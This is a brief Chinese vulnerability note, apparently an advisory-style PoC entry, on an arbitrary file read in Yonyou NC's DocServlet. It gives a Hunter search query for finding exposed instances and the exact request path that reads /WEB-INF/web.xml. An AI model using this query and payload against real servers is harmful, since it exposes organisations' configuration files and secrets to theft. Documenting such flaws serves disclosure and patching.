登录 白背景

用友NC nc.uap.lfw.file.action.DocServlet存在任意文件读取漏洞

一、漏洞简介

用友 NC nc.uap.lfw.file.action.DocServlet存在任意文件读取漏洞,可通过该漏洞获取敏感信息。

二、影响版本

  • 用友NC

三、资产测绘

- huiter:`app.name=="用友 UAP"`

1691729367315-f00b542f-0929-41cc-8671-84149242ffca.png

  • 登录页面

1691729393165-7891d318-bbd8-4761-87d4-76fee42778ec.png

四、漏洞复现

/servlet/~webrt/nc.uap.lfw.file.action.DocServlet?disp=/WEB-INF/web.xml

1699583736116-15982cec-0904-45ac-800f-f9673a15f7d8.png

原文: https://www.yuque.com/xiaokp7/ocvun2/apgsx71nunqm7sai